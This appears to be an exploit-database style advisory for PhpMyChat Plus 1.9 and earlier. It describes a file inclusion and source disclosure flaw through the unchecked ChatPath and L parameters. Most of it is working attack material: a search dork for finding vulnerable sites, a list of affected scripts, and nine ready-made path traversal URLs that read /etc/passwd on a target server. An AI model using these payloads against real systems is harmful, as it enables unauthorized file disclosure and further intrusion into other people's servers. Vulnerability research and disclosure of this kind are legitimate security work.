PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
a*******************************************************************************
# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure
Vulnerabilities
# Author : ajann
# Dork : phpMyChat plus
# Vuln;
*******************************************************************************
[Files]
avatar.php
colorhelp_popup.php
color_popup.php
index.php
index1.php
/lib/connected_users.lib.php
/lib/index.lib.php
logs.php
phpMyChat.php3
[/Files]
[Code,1]
connected_users.lib.php Error:
..
....
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
require("./${ChatPath}/lib/clean.lib.php");
....
..
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] L=[file]
Key [:] ChatPath=[file]
\Example:
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
http://target.com/path/index.php?ChatPath=../../etc/passwd
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://target.com/path/logs.php?L=../../etc/passwd
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd
# ajann,Turkey
# ...
# Im not Hacker!